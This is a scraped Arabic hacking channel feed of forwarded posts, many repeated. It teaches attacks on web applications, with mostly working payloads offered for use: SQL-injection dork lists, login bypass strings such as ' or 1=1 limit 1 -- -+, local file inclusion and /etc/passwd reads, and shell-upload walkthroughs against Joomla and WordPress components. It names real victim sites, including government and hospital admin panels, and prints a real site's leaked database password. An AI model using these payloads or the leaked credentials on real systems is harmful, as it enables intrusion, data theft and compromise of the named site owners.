October 29, 2019
Forwarded from Termux CS
دوركات sql😍
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
Services.php?ID=
shippinginfo.php?CartId=
shop.php?a=
shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop_details.php?prodid=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
ShopSearch.php?CategoryID=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show_item.php?id=
show_item_details.php?item_id=
showbook.php?bookid=
showStore.php?catID=
shprodde.php?SKU=
specials.php?id=
store.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
#CS
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
Services.php?ID=
shippinginfo.php?CartId=
shop.php?a=
shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop_details.php?prodid=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
ShopSearch.php?CategoryID=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show_item.php?id=
show_item_details.php?item_id=
showbook.php?bookid=
showStore.php?catID=
shprodde.php?SKU=
specials.php?id=
store.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
#CS
October 29, 2019
7- ثغره ثغرة Rce bot
وهي بنظري تعد أسهل ثغرة ...
هذه اثغرة تمكنك من رفع الشيل الخاص بك بسهولة .
#نبدأ شرح الإستغلال :
دورك البحث الخاص بالثغرة :
inurl:viewtable?cid=
موقع مصاب :
http://www.cittainfinite.eu
الاستغلال :
/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
مسار الشيل بعد الرفع :
/media/اسم الشيل.php
#هنا يبدأ عملناا ...
نقوم بوضع رابط الموقع المصاب ... ونلحق به الاستغلال ... مثل :
http://www.cittainfinite.eu/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
وبعدها سيخرج لنا مركز رفع ... وبعد الرفع نجد الشيل في هذا المسار :
http://www.cittainfinite.eu /media/اسم الشيل.php
وهي بنظري تعد أسهل ثغرة ...
هذه اثغرة تمكنك من رفع الشيل الخاص بك بسهولة .
#نبدأ شرح الإستغلال :
دورك البحث الخاص بالثغرة :
inurl:viewtable?cid=
موقع مصاب :
http://www.cittainfinite.eu
الاستغلال :
/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
مسار الشيل بعد الرفع :
/media/اسم الشيل.php
#هنا يبدأ عملناا ...
نقوم بوضع رابط الموقع المصاب ... ونلحق به الاستغلال ... مثل :
http://www.cittainfinite.eu/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
وبعدها سيخرج لنا مركز رفع ... وبعد الرفع نجد الشيل في هذا المسار :
http://www.cittainfinite.eu /media/اسم الشيل.php
www.cittainfinite.eu
Città Infinite
Citta Infinite
October 29, 2019
Forwarded from Termux CS
اسوورد وهي مشفرة كالسابق على مقياس DES
فك تشفيرها وانتهينا
ألحين راح نلاحظ الثغرة على هذه الصفحة
http://www.modammer.com/cgi-bin/webBBS/profiles/
-------------------------------
WebAdverts Script بواسطة Darryl C. Burgdorf
كالسابق تقريبا لكن يسمح لصاحب الموقع لإضافة وتعديل Banners الخاص بالموقع
وهذا السكربت يحتوي على نقطة ضعف تعرض معلومات حساسة
المحل الرئيسي للباسوورد الموجود في Webadverts هو:
http://www.modammer.com/cgi-bin/advert/adpassword.txt
بعد فك تشفير الباسوورد نذهب إلى هذه الصفحة :
http://www.modammer.com/cgi-bin/advert/ads_admin.pl
-------------------------------
WWWBoard Script
هو أيضا من أنواع المنتديات وتستخدم في الاعلانات
هالمرة ملف الباسوورد راح يكون صريح معاك وملفه يحمل اسم password.txt
اذا تريد مزيد من الثغرات فقط اذهب ابحث عن
cgi-bin/wwwebboard أو webboard/password.txt
-------------------------------
Mailmachine Script
Mailmachine.cgi عبارة عن سكربت ليقوم بعمل MailingList
عليك برؤية ملف addresses.txt
حيث يحتوي على عناوين إيميلات الذين قاموا بالاشتراك
كثير من CGI-Maillists تحتوي على هذه الأخطاء
مكان وجود الثغرة:
http://www.modammer.com/cgi-bin/mailman/addresses.txt
http://www.modammer.com/cgi-bin/maillist/addresses.txt
http://www.modammer.com/cgi-bin/mail/addresses.txt
وأيضا يجب عليك أن تبحث عن addresses.txt لكن احيانا ملفات العناوين تختلف لذلك عليك بالذهاب إلى
http://www.modammer.com/cgi-bin/maillist/subscribe.htm
***************************
هناك سكربتات كثيرة يمكنك استغلالها بنفسك وأيضا هذا النوع من الثغرات
سهل انك تبحث عن ثغرة خلاله وتستغلها ...
***************************
1.7 كيف لي أن أجد موقع مصاب بثغرة ؟
++++++++++++++++++++++++
قبل مانشرح بكم كيف تبحث عن موقع مصاب اخواني انتم لاتتعلمون لأجل أن تخربون بل بالعكس لكي تزيدون من معرفتكم وهذا مايحمسني لقراءة المزيد من المواضيع ...
ومو أي موقع يحتوي على CGI-Scripts تخترقونه !!!
هذا ليس علم ولانفع
وحاول تتعلم لغة Perl اللغة التي تمتم بها كتابة أكثر من CGI-Scripts بواسطتها
لذلك حاولوا ان تبحثوا عن الاجوبة والحلول قبل ان تبحثوا عن طرق الاخترق
الحين نقولكم كيف تبحثون عن موقع مصاب بهذا النوع من السكربتات اقولكم كثير ومن السهل فعل ذلك فقط استخدم محركات بحث متطورة وكبيرة مثل:
http://www.google.com
http://www.altavista.com
هذي المحركات سوف تبحث لك عن اي مطابق لكلمة
cgi-bin أو cgi-bin/calendar.cfg أو cgi-bin/password.tx etc. etc
لذلك عليك بكتابة
cgi-bin/
وفيه برنامج جميل احب اطلعكم عليه وهو
Intellitamper
يسمح لك بمعرفة الملفات على السيرفر
(راح يساعدك كثير)
الموقع:www.intellitamper.com
1.8 الحلول الممكنة Solutions
++++++++++++++++++++++++
هناك المزيد من الحلول لكن الحل الأمثل والأساسي هو عمل Lock على مجلدات CGI-BIN/
حل آخر وهو زيارة مواقع BugTraq والتي تحتوي على تفاصيل اخر الثغرات فقط استخدم محرك البحث الذي تحتويه هذه المواقع وسوف تجد حلول لثغرات CGI
المواقع/
http://www.securityfocus.com
http://www.securiteam.com
#cs
فك تشفيرها وانتهينا
ألحين راح نلاحظ الثغرة على هذه الصفحة
http://www.modammer.com/cgi-bin/webBBS/profiles/
-------------------------------
WebAdverts Script بواسطة Darryl C. Burgdorf
كالسابق تقريبا لكن يسمح لصاحب الموقع لإضافة وتعديل Banners الخاص بالموقع
وهذا السكربت يحتوي على نقطة ضعف تعرض معلومات حساسة
المحل الرئيسي للباسوورد الموجود في Webadverts هو:
http://www.modammer.com/cgi-bin/advert/adpassword.txt
بعد فك تشفير الباسوورد نذهب إلى هذه الصفحة :
http://www.modammer.com/cgi-bin/advert/ads_admin.pl
-------------------------------
WWWBoard Script
هو أيضا من أنواع المنتديات وتستخدم في الاعلانات
هالمرة ملف الباسوورد راح يكون صريح معاك وملفه يحمل اسم password.txt
اذا تريد مزيد من الثغرات فقط اذهب ابحث عن
cgi-bin/wwwebboard أو webboard/password.txt
-------------------------------
Mailmachine Script
Mailmachine.cgi عبارة عن سكربت ليقوم بعمل MailingList
عليك برؤية ملف addresses.txt
حيث يحتوي على عناوين إيميلات الذين قاموا بالاشتراك
كثير من CGI-Maillists تحتوي على هذه الأخطاء
مكان وجود الثغرة:
http://www.modammer.com/cgi-bin/mailman/addresses.txt
http://www.modammer.com/cgi-bin/maillist/addresses.txt
http://www.modammer.com/cgi-bin/mail/addresses.txt
وأيضا يجب عليك أن تبحث عن addresses.txt لكن احيانا ملفات العناوين تختلف لذلك عليك بالذهاب إلى
http://www.modammer.com/cgi-bin/maillist/subscribe.htm
***************************
هناك سكربتات كثيرة يمكنك استغلالها بنفسك وأيضا هذا النوع من الثغرات
سهل انك تبحث عن ثغرة خلاله وتستغلها ...
***************************
1.7 كيف لي أن أجد موقع مصاب بثغرة ؟
++++++++++++++++++++++++
قبل مانشرح بكم كيف تبحث عن موقع مصاب اخواني انتم لاتتعلمون لأجل أن تخربون بل بالعكس لكي تزيدون من معرفتكم وهذا مايحمسني لقراءة المزيد من المواضيع ...
ومو أي موقع يحتوي على CGI-Scripts تخترقونه !!!
هذا ليس علم ولانفع
وحاول تتعلم لغة Perl اللغة التي تمتم بها كتابة أكثر من CGI-Scripts بواسطتها
لذلك حاولوا ان تبحثوا عن الاجوبة والحلول قبل ان تبحثوا عن طرق الاخترق
الحين نقولكم كيف تبحثون عن موقع مصاب بهذا النوع من السكربتات اقولكم كثير ومن السهل فعل ذلك فقط استخدم محركات بحث متطورة وكبيرة مثل:
http://www.google.com
http://www.altavista.com
هذي المحركات سوف تبحث لك عن اي مطابق لكلمة
cgi-bin أو cgi-bin/calendar.cfg أو cgi-bin/password.tx etc. etc
لذلك عليك بكتابة
cgi-bin/
وفيه برنامج جميل احب اطلعكم عليه وهو
Intellitamper
يسمح لك بمعرفة الملفات على السيرفر
(راح يساعدك كثير)
الموقع:www.intellitamper.com
1.8 الحلول الممكنة Solutions
++++++++++++++++++++++++
هناك المزيد من الحلول لكن الحل الأمثل والأساسي هو عمل Lock على مجلدات CGI-BIN/
حل آخر وهو زيارة مواقع BugTraq والتي تحتوي على تفاصيل اخر الثغرات فقط استخدم محرك البحث الذي تحتويه هذه المواقع وسوف تجد حلول لثغرات CGI
المواقع/
http://www.securityfocus.com
http://www.securiteam.com
#cs
October 29, 2019
Forwarded from Termux CS
ثغرة Local File Include
بسم الله الرحمن الرحيم
اخواني الكرام
السلام عليكم و رحمة الله وبركاته
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف:http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=index
طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/تمام
او بإمكانك فك التشفير عن طريق الشيل !!!
والمراد من فك التشفير هو الحصول على ملف الكونيفق
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=config_inc
الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom
#CS
بسم الله الرحمن الرحيم
اخواني الكرام
السلام عليكم و رحمة الله وبركاته
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف:http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=index
طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/تمام
او بإمكانك فك التشفير عن طريق الشيل !!!
والمراد من فك التشفير هو الحصول على ملف الكونيفق
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=config_inc
الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom
#CS
October 29, 2019
Forwarded from Termux CS
ثغرة wptf-image-gallery 1.0.3 - Remote File Download
الاستغلال
./wptf-image-gallery/lib-mbox/ajax_load.php
شرح
http://www.site.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
#CS
الاستغلال
./wptf-image-gallery/lib-mbox/ajax_load.php
شرح
http://www.site.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
#CS
October 29, 2019
Forwarded from Termux CS
الثغرة
Local File Disclosure in wordpress theme Diarise
الدورك
inurl:"wp-content/themes/diarise/"
الاستغلال
http://site.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ]
#CS
Local File Disclosure in wordpress theme Diarise
الدورك
inurl:"wp-content/themes/diarise/"
الاستغلال
http://site.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ]
#CS
October 29, 2019
Forwarded from Termux CS
الدورك intext:"ISPROJEK"
بعدها العثور علي لوحه التحكم
راح يكون اليوزر و الباس تبعهم
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
الثاني
الدورك
filename:”wp-config.php” “define(‘DB_PASSWORD’,” extension:php
الدورك
inurl:"index.php?mnu=login"
الاستخدام
/ index.php?mnu=admin
الدورك
intext:"Powered by iyiWebSitesi"
الاستخدام
لوحه التحكم
testpage.com/admin
sql bypass
id : = ' /*!or*/1=1#
pass : = ' /*!or*/1=1#
#cs
بعدها العثور علي لوحه التحكم
راح يكون اليوزر و الباس تبعهم
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
الثاني
الدورك
filename:”wp-config.php” “define(‘DB_PASSWORD’,” extension:php
الدورك
inurl:"index.php?mnu=login"
الاستخدام
/ index.php?mnu=admin
الدورك
intext:"Powered by iyiWebSitesi"
الاستخدام
لوحه التحكم
testpage.com/admin
sql bypass
id : = ' /*!or*/1=1#
pass : = ' /*!or*/1=1#
#cs
October 29, 2019
Forwarded from Termux CS
ثغرة PHPMiniAdmin 1.9 Database Open No-Secure Exploit
الدورك
inurl:phpminiadmin.php
الاستغلال
https://site.com/salon/db/phpminiadmin.php
#CS
الدورك
inurl:phpminiadmin.php
الاستغلال
https://site.com/salon/db/phpminiadmin.php
#CS
October 29, 2019
Forwarded from Termux CS
ثغرة ال
Joomla RSFirewall Components 2.11.25 Database and Password Disclosure
الدورك
inurl:''/index.php?option=com_rsfirewall''
أو
inurl:''/administrator/components/com_rsfirewall/'' intext:Hosted & Designed By Suryanandan.net
أو
intext:Designed by Artilabio
الاستغلال
ممكن نسحب اللسته تبع الباسورد
/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt
أو الوصول لقاعدة البيانات
/administrator/components/com_rsfirewall/sql/mysql/configuration.data.sql
/administrator/components/com_rsfirewall/sql/mysql/configuration.sql
/administrator/components/com_rsfirewall/sql/mysql/exceptions.sql
/administrator/components/com_rsfirewall/sql/mysql/feeds.data.sql
/administrator/components/com_rsfirewall/
وغيرها من القواعد
مثال
www.ippbm.gov.my/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt
#CS
Joomla RSFirewall Components 2.11.25 Database and Password Disclosure
الدورك
inurl:''/index.php?option=com_rsfirewall''
أو
inurl:''/administrator/components/com_rsfirewall/'' intext:Hosted & Designed By Suryanandan.net
أو
intext:Designed by Artilabio
الاستغلال
ممكن نسحب اللسته تبع الباسورد
/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt
أو الوصول لقاعدة البيانات
/administrator/components/com_rsfirewall/sql/mysql/configuration.data.sql
/administrator/components/com_rsfirewall/sql/mysql/configuration.sql
/administrator/components/com_rsfirewall/sql/mysql/exceptions.sql
/administrator/components/com_rsfirewall/sql/mysql/feeds.data.sql
/administrator/components/com_rsfirewall/
وغيرها من القواعد
مثال
www.ippbm.gov.my/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt
#CS
October 29, 2019
Forwarded from Termux CS
الاسم : SO-AT Solution CMS Bypass SQL Login
الدورك inurl:/coop/re_register.php
الاستغلال
/coop/adminlogon.php
User: ' or 1=1 limit 1 -- -+
Password: ' or 1=1 limit 1 -- -+
أمثلة
http://healthcoop.or.th/coop/adminlogon.php
http://www.tot-coop.com/coop/adminlogon.php
#CS
الدورك inurl:/coop/re_register.php
الاستغلال
/coop/adminlogon.php
User: ' or 1=1 limit 1 -- -+
Password: ' or 1=1 limit 1 -- -+
أمثلة
http://healthcoop.or.th/coop/adminlogon.php
http://www.tot-coop.com/coop/adminlogon.php
#CS
October 29, 2019
October 29, 2019
Forwarded from Termux CS
ثغرة (FTP2FTP ( Arbitrary File Download :
الدورك
: inurl:/download2.php?id=
—
الاستغلال
http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php
—
مثال
http://www.supersat.cz/download/azbox/download2.php?id=23
after exploit :
http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================
#CS
الدورك
: inurl:/download2.php?id=
—
الاستغلال
http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php
—
مثال
http://www.supersat.cz/download/azbox/download2.php?id=23
after exploit :
http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================
#CS
October 29, 2019
Forwarded from Termux CS
ثغرة Bypass Admin Panel
الدورك
© Copyright 2019 Developed by VSFB Developers Zone. All Rights Reserved. |
#username password: '='or' |
مثال
http://nationalhairtransplant.in/admin/dashboard.php
http://delhiskinhospital.com/admin/dashboard.php?mes=login
http://www.saraogicolorlab.com/admin/login.php
#CS
الدورك
© Copyright 2019 Developed by VSFB Developers Zone. All Rights Reserved. |
#username password: '='or' |
مثال
http://nationalhairtransplant.in/admin/dashboard.php
http://delhiskinhospital.com/admin/dashboard.php?mes=login
http://www.saraogicolorlab.com/admin/login.php
#CS
October 29, 2019
Forwarded from Termux CS
ثغرة
WordPress St_Newsletter Swift Mailer Plugins 2.7 Remote Shell Upload Vulnerability
Dork: inurl:''/wp-content/plugins/st_newsletter/''
Google Dorks : inurl:''/wp-content/plugins/st_newsletter/'' + intext:''© 2016 Prevent Cancer Now SUM LogoSUM Brand + Design'' + intext:''Copyright © 2000-2012 Silicon Valley Fellowship'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] + CWE-434: Unrestricted Upload of File with Dangerous Type # Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ] #################################################################################################
# Exploit :
/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/browser.html
/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/frmupload.html
/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/fckeditor.html
# Directory File Path : /wp-content/uploads/...... /wp-content/uploads/[YEAR]/
Exploit : phpinfo System Information
/wp-content/plugins/st_newsletter/Swift5/tests/units/runTests.php ############################
مثال
[+] revistamoviola.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
[+] earthnc.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
[+] siliconvalleyfellowship.org/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
[+] pedibus-geneve.ch/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
[+] parkdietzassociates.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
[+] storytellerwine.com/wine/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
[+] preventcancernow.ca/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
#cs
WordPress St_Newsletter Swift Mailer Plugins 2.7 Remote Shell Upload Vulnerability
Dork: inurl:''/wp-content/plugins/st_newsletter/''
Google Dorks : inurl:''/wp-content/plugins/st_newsletter/'' + intext:''© 2016 Prevent Cancer Now SUM LogoSUM Brand + Design'' + intext:''Copyright © 2000-2012 Silicon Valley Fellowship'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] + CWE-434: Unrestricted Upload of File with Dangerous Type # Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ] #################################################################################################
# Exploit :
/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/browser.html
/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/frmupload.html
/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/fckeditor.html
# Directory File Path : /wp-content/uploads/...... /wp-content/uploads/[YEAR]/
Exploit : phpinfo System Information
/wp-content/plugins/st_newsletter/Swift5/tests/units/runTests.php ############################
مثال
[+] revistamoviola.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
[+] earthnc.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
[+] siliconvalleyfellowship.org/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
[+] pedibus-geneve.ch/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
[+] parkdietzassociates.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
[+] storytellerwine.com/wine/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
[+] preventcancernow.ca/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
#cs
October 29, 2019
Forwarded from Termux CS
ثغرة wptf-image-gallery 1.0.3 - Remote File Download
الاستغلال
./wptf-image-gallery/lib-mbox/ajax_load.php
شرح
http://www.site.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
#CS
الاستغلال
./wptf-image-gallery/lib-mbox/ajax_load.php
شرح
http://www.site.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
#CS
October 29, 2019
Forwarded from Termux CS
نظره على ثغرات HTTP Response Splitting |
